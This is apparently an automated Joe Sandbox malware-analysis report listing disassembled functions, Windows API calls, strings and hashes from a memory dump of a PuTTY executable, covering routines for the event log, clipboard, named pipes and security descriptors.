Part of subcall function 00BE9BE0: GetLocalTime.KERNEL32(?,?,?,?,00BC50A4,?), ref: 00BE9BF6

_strftime.LIBCMT ref: 00BC5779

Part of subcall function 00BC5AF0: _strlen.LIBCMT ref: 00BC5B1D

Strings

Outgoing, xrefs: 00BC5788, 00BC5791, 00BC57D9, 00BC57E1
#0x%lx, , xrefs: 00BC57F6
%08zx%*s, xrefs: 00BC5977
Incoming, xrefs: 00BC5783, 00BC57D4
XX, xrefs: 00BC59B9
(%s), xrefs: 00BC583B
%s raw data at %s, xrefs: 00BC5792
%s packet , xrefs: 00BC57E2
(%zu byte%s omitted), xrefs: 00BC594B, 00BC5AAB
on behalf of downstream #%u, xrefs: 00BC5828
%Y-%m-%d %H:%M:%S, xrefs: 00BC5771
%02x, xrefs: 00BC59E3
type %d / 0x%02x (%s), xrefs: 00BC5807

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: LocalTime_strftime_strlen
String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
API String ID: 4241967358-2889948183
Opcode ID: 7fa6128297936f3ccb827a8844e384c777aebecc137aa0d4ec54fbfcef8f821f
Instruction ID: db066ec1b4c6a423f5de6de97d7ee826fed05adbfb3ca7021aaaa7c7a227ac2a
Opcode Fuzzy Hash: 7fa6128297936f3ccb827a8844e384c777aebecc137aa0d4ec54fbfcef8f821f
Instruction Fuzzy Hash: FFA1D471608B449BCB34AA15DC95FBF73E5EBC5304F4849ADF88A87342E671B9848782

Function 00BBE7C0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 262windowCOMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 00BBE807
SendDlgItemMessageA.USER32(?,000003E9,00000192,00000002,00CA2020), ref: 00BBE828
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00BBE854
SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000), ref: 00BBE8AB
GetParent.USER32(?), ref: 00BBE8D2
SetActiveWindow.USER32(00000000), ref: 00BBE8D9
DestroyWindow.USER32(?), ref: 00BBE8E0
SendDlgItemMessageA.USER32(?,000003E9,00000190,00000000,00000000), ref: 00BBE91F
SendDlgItemMessageA.USER32(?,000003E9,00000191,00000000,00000000), ref: 00BBE94F
_strlen.LIBCMT ref: 00BBE996
MessageBeep.USER32(00000000), ref: 00BBE9C5
_strlen.LIBCMT ref: 00BBEA2E
SendDlgItemMessageA.USER32(?,000003E9,00000185,00000000,00000000), ref: 00BBEB01

Strings

%s Event Log, xrefs: 00BBE7F6

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Message$ItemSend$Window$_strlen$ActiveBeepDestroyParentText
String ID: %s Event Log
API String ID: 2560716093-583241876
Opcode ID: 4915a5255e7b885f4be689974b434b3271306757d3f516758f0e6f263363f4f0
Instruction ID: 52ea6a29f7253fa8c1150dc64b2a0a35c9d54cb91823d5d87be8b0a2ef838221
Opcode Fuzzy Hash: 4915a5255e7b885f4be689974b434b3271306757d3f516758f0e6f263363f4f0
Instruction Fuzzy Hash: A991F271A04304ABE7259F20EC86BFE77E8EB45708F00056AF955D72E1E7F0E9049B86

Function 00BDCBD0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDCD70: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52EC), ref: 00BDCDED
Part of subcall function 00BDCD70: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52F0), ref: 00BDCE1C
Part of subcall function 00BDCD70: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52F0), ref: 00BDCE26

LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00BDCC9D
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00BDCCAD
SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00BDCCC2
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00BDCCD5
GetLastError.KERNEL32(?,00000000,?), ref: 00BDCD0D
LocalFree.KERNEL32(00000000), ref: 00BDCD30
LocalFree.KERNEL32(00000000), ref: 00BDCD44

Strings

unable to construct ACL: %s, xrefs: 00BDCC8B
unable to set owner in security descriptor: %s, xrefs: 00BDCD01
unable to allocate security descriptor: %s, xrefs: 00BDCCF3, 00BDCD1D
unable to set DACL in security descriptor: %s, xrefs: 00BDCD08
unable to initialise security descriptor: %s, xrefs: 00BDCCFA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
API String ID: 436594416-3066058096
Opcode ID: dcb1fb0e9b74a17e9c386e1a316332ee80b990995b1a831fa5b256231e9ee734
Instruction ID: 04ff1d352ab2183f0e7e174a0e2f772de711eeb19efb9fa3fa1b588a6783e606
Opcode Fuzzy Hash: dcb1fb0e9b74a17e9c386e1a316332ee80b990995b1a831fa5b256231e9ee734
Instruction Fuzzy Hash: 814137B0604305ABEB109F24DC48B5ABFE5FB85704F14847AF9899B3A0E776D801CB52

Function 00BA1E56 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 360windowtimeCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA2670
GetCursorPos.USER32(?), ref: 00BA2682
IsZoomed.USER32 ref: 00BA26F5
GetWindowLongA.USER32(000000F0), ref: 00BA2707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BA273D
GetKeyboardState.USER32(?), ref: 00BA2758
GetKeyboardState.USER32(?), ref: 00BA2782
GetMessageTime.USER32 ref: 00BA2811
ReleaseCapture.USER32 ref: 00BA2A03
SetCapture.USER32(?), ref: 00BA2D59

Strings

(, xrefs: 00BA26AA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CaptureCursorKeyboardMessageState$LongReleaseSendShowTimeWindowZoomed
String ID: (
API String ID: 3533334589-3887548279
Opcode ID: 3e196aa76939e8cba9119aef6518d16e347613ffe11cc701df518c02f21f3eff
Instruction ID: de67a470d5be5d629ba7fcae598d6cbf5e114b26ec3d4fd3960b967fb708093e
Opcode Fuzzy Hash: 3e196aa76939e8cba9119aef6518d16e347613ffe11cc701df518c02f21f3eff
Instruction Fuzzy Hash: FBC121B2A0C250AFDB288B2CDCA573E7BE1EB86704F18446DF986C32A1E635DD40D751

Function 00BAB280 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00BAB2AC

Strings

hhctrl.ocx, xrefs: 00BAB293
HtmlHelpA, xrefs: 00BAB2A6
Software\SimonTatham\PuTTY\CHMPath, xrefs: 00BAB371
Software\SimonTatham\PuTTY64\CHMPath, xrefs: 00BAB359

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AddressProc
String ID: HtmlHelpA$Software\SimonTatham\PuTTY64\CHMPath$Software\SimonTatham\PuTTY\CHMPath$hhctrl.ocx
API String ID: 190572456-509675872
Opcode ID: d0aa3d304dd4aafe7c4e778b24e7a7e696af09717aa113a591476c91bf10f98a
Instruction ID: 0ecd95aecd679fefd567aac720b2c6e61a74e1ea2fe42e7af9a90d1eeb710f75
Opcode Fuzzy Hash: d0aa3d304dd4aafe7c4e778b24e7a7e696af09717aa113a591476c91bf10f98a
Instruction Fuzzy Hash: E121C8706083C16BEB21AB75BC5AB5D7ED4DB1770DF0400AAF805D72A2E7E1C941CB59

Function 00C30910 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 121pipeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDEF00: _strlen.LIBCMT ref: 00BDEF0B

___from_strstr_to_strchr.LIBCMT ref: 00C309A6
CreateNamedPipeA.KERNEL32(?,40080003,00000008,000000FF,00001000,00001000,00000000), ref: 00C30A19
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C30A52
GetLastError.KERNEL32 ref: 00C30A78

Part of subcall function 00BDD3E0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
Part of subcall function 00BDD3E0: _strlen.LIBCMT ref: 00BDD476

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-server.c, xrefs: 00C30984, 00C309B7
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00C30989
\\.\pipe\, xrefs: 00C3096D
strchr(pipename + 9, '\\') == NULL, xrefs: 00C309BC
unable to create named pipe '%s': %s, xrefs: 00C30A8C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Create_strlen$ErrorEventFormatLastMessageNamedPipe___from_strstr_to_strchr
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
API String ID: 2501268550-387693737
Opcode ID: 824c4b2a6a471474ba9d43a64d3cd41b8c7b9a840cdf22e75598fc5e200eef09
Instruction ID: 1903f965843256c6d86ad14733aa33c5e7504d4d01d066a834fa39c31183636a
Opcode Fuzzy Hash: 824c4b2a6a471474ba9d43a64d3cd41b8c7b9a840cdf22e75598fc5e200eef09
Instruction Fuzzy Hash: 8241B4B16407006FE320AF24DC1AF1B7BE4EF44B58F14492DF9899B2D2E7B1A5048B95

Function 00BA6150 Relevance: 15.1, APIs: 10, Instructions: 61clipboardwindowmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00002002,?), ref: 00BA616C
GlobalLock.KERNEL32(00000000), ref: 00BA617D
GlobalUnlock.KERNEL32(00000000), ref: 00BA61A0
SendMessageA.USER32(00008002,00000001,00000000), ref: 00BA61B9
OpenClipboard.USER32 ref: 00BA61C5
EmptyClipboard.USER32 ref: 00BA61CF
SetClipboardData.USER32(00000001,00000000), ref: 00BA61D8
CloseClipboard.USER32 ref: 00BA61DE
SendMessageA.USER32(00008002,00000000,00000000), ref: 00BA61F7
GlobalFree.KERNEL32(00000000), ref: 00BA6203

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 1228832834-0
Opcode ID: d3e5c5f9a70e1e3b12cb3e47bea668abd01cf65674b0c0db743391eeca74d8e4
Instruction ID: 7aed1824cad4b92294dbb5c5d5ebd43a90032837e96cf177f7a6ac17b11962c1
Opcode Fuzzy Hash: d3e5c5f9a70e1e3b12cb3e47bea668abd01cf65674b0c0db743391eeca74d8e4
Instruction Fuzzy Hash: 6811A371248215AFE7211F65EC0DFAE7FACFF42785F18407AF984E60A1DB218916C721

Function 00BDCD70 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52EC), ref: 00BDCDED
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52F0), ref: 00BDCE1C
GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52F0), ref: 00BDCE26

Part of subcall function 00BDCA80: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCAB7
Part of subcall function 00BDCA80: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCAC5
Part of subcall function 00BDCA80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB04
Part of subcall function 00BDCA80: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB21
Part of subcall function 00BDCA80: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB4B
Part of subcall function 00BDCA80: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BDCB6A
Part of subcall function 00BDCA80: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB8B
Part of subcall function 00BDCA80: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCB9A
Part of subcall function 00BDCA80: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75295780,00BDCEC7), ref: 00BDCBA5

GetLastError.KERNEL32 ref: 00BDCE3D
GetLastError.KERNEL32 ref: 00BDCE54

Part of subcall function 00BDD3E0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
Part of subcall function 00BDD3E0: _strlen.LIBCMT ref: 00BDD476

Strings

unable to construct SID for local same-user access only: %s, xrefs: 00BDCE36
unable to construct SID for world: %s, xrefs: 00BDCE64
unable to construct SID for current user: %s, xrefs: 00BDCE4D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen_strlen
String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
API String ID: 3303103131-2222155745
Opcode ID: b6dd36bbaced2c028f2a1a0f814eb6650716dbd3e4b0594aab46898c94a361f6
Instruction ID: d03c8f3ad5dee4d03f19f6b6fc3feb7301b3a16eb8c398a769d0dc5dddea72c9
Opcode Fuzzy Hash: b6dd36bbaced2c028f2a1a0f814eb6650716dbd3e4b0594aab46898c94a361f6
Instruction Fuzzy Hash: F82190B1640301ABD710AFA4EC8AB2EBBE8EB09704F14457EF845D7391E7749845CB56

Function 00BC0580 Relevance: 13.9, APIs: 9, Instructions: 379windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,00000180,00000000,00C93707), ref: 00BC05D5
SetWindowLongA.USER32(?,00000000,00000001), ref: 00BC05FB
SendDlgItemMessageA.USER32(?,?,00000188,00000000,00000000), ref: 00BC0645
SendDlgItemMessageA.USER32(?,?,0000018B,00000000,00000000), ref: 00BC0660
SendDlgItemMessageA.USER32(00000001,FFFFFFFF,00000182,?,00000000), ref: 00BC08DD
SendDlgItemMessageA.USER32(?,?,00000199,00000000,00000000), ref: 00BC09ED

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend$LongWindow
String ID:
API String ID: 1736968133-0
Opcode ID: f80a79ed2a6d701e070cc4fdf056d1e7e101b73ea032b9d3db8329def9ecf58d
Instruction ID: 8b081a7b505a37a68cc7be74cfd65d038ac4f6563b0c00e6f37d40ad8157e6d7
Opcode Fuzzy Hash: f80a79ed2a6d701e070cc4fdf056d1e7e101b73ea032b9d3db8329def9ecf58d
Instruction Fuzzy Hash: 81D17032618300EFD7149F18CC84B2ABBE5EBC9720F158A6DF9A597391D7B1EC418B91

Function 00BC9240 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000107), ref: 00BC9269
_strlen.LIBCMT ref: 00BC9270
FindFirstFileA.KERNEL32(?,?), ref: 00BC928D
FindNextFileA.KERNEL32(00000000,?), ref: 00BC92AD
FindClose.KERNEL32(00000000), ref: 00BC92B4
GetCurrentProcessId.KERNEL32 ref: 00BC92BA

Strings

\*, xrefs: 00BC9278

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows_strlen
String ID: \*
API String ID: 4151488164-2355939697
Opcode ID: 29d93484c56541796eac8a850d4870e97603c995a1283e04ebb8e0b786ed35b9
Instruction ID: 96c6596b3033b31a75208ac5159031c7ef6ab15c375bd21adf03e54659ca8266
Opcode Fuzzy Hash: 29d93484c56541796eac8a850d4870e97603c995a1283e04ebb8e0b786ed35b9
Instruction Fuzzy Hash: CE11D672944314ABD2217B24BC4EF9F76989F4A349F050428F988D6281E7356A1687E7

Function 00BA1130 Relevance: 12.3, APIs: 8, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090daf2ba62f0e78a012cca9196b73e08786948b74cf9ed58f3991566cf747af
Instruction ID: 987187b1f0e9319f44d1a011c19c81bc1da1a0e7a1da41978fbd0c2c3f9553cb
Opcode Fuzzy Hash: 090daf2ba62f0e78a012cca9196b73e08786948b74cf9ed58f3991566cf747af
Instruction Fuzzy Hash: C7B104B0A083409FDB649F68DCA576E77E5FB86304F54886EF885C7291DB34DA44CB42

Function 00BBAF90 Relevance: 9.3, Strings: 6, Instructions: 1763COMMON

Download Yara Rule

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/bidi.c, xrefs: 00BBB3B7, 00BBB43F, 00BBB564, 00BBB5F9, 00BBB6F7, 00BBB800, 00BBC67D
i == ctx->textlen - 1, xrefs: 00BBB569
ctx->ds_sp < lenof(ctx->dsstack), xrefs: 00BBB5FE, 00BBB6FC
false && "how did this get past the outer switch?", xrefs: 00BBC682
ctx->levels[j] == irslevel, xrefs: 00BBB805
ctx->ds_sp > 0, xrefs: 00BBB3BC, 00BBB444

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/bidi.c$ctx->ds_sp < lenof(ctx->dsstack)$ctx->ds_sp > 0$ctx->levels[j] == irslevel$false && "how did this get past the outer switch?"$i == ctx->textlen - 1
API String ID: 0-756103520
Opcode ID: 120d3432ba797920fea3380c1e89a24bc0a32989813ac6f70a98aac97e8cf06d
Instruction ID: e5cd4ed914911e747cbfda11db637957486ffc067a4a2d18e670a73a6d78d814
Opcode Fuzzy Hash: 120d3432ba797920fea3380c1e89a24bc0a32989813ac6f70a98aac97e8cf06d
Instruction Fuzzy Hash: 14E2AC756087058FCB24CE18C4D0ABAB7E2FB99310F5889ADE99A9B351D7B1FC01CB45

Function 00BDE140 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00BDE282
GetCPInfo.KERNEL32(?,?), ref: 00BDE36F
GetACP.KERNEL32 ref: 00BDE3E6
GetOEMCP.KERNEL32 ref: 00BDE3F3

Strings

UTF-8, xrefs: 00BDE179

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Info
String ID: UTF-8
API String ID: 1807457897-243350608
Opcode ID: 1c01a36e4d2b1a21a9730bede4ec6d884130b84262e9625cab4122d4c7887342
Instruction ID: be8608109d3234f15cd43221e6622f3a0fb35db0538efa48e1ad5007c96cd7b4
Opcode Fuzzy Hash: 1c01a36e4d2b1a21a9730bede4ec6d884130b84262e9625cab4122d4c7887342
Instruction Fuzzy Hash: 177123756043415BD7226A3448D523EB7D4AF45374F184AAAF8B68F381F231DD889296

Function 00BD05F0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BD0676

Strings

%s%s, xrefs: 00BD070A
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/settings.c, xrefs: 00BD0755
p - buf == maxlen, xrefs: 00BD075A
Cipher, xrefs: 00BD076B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
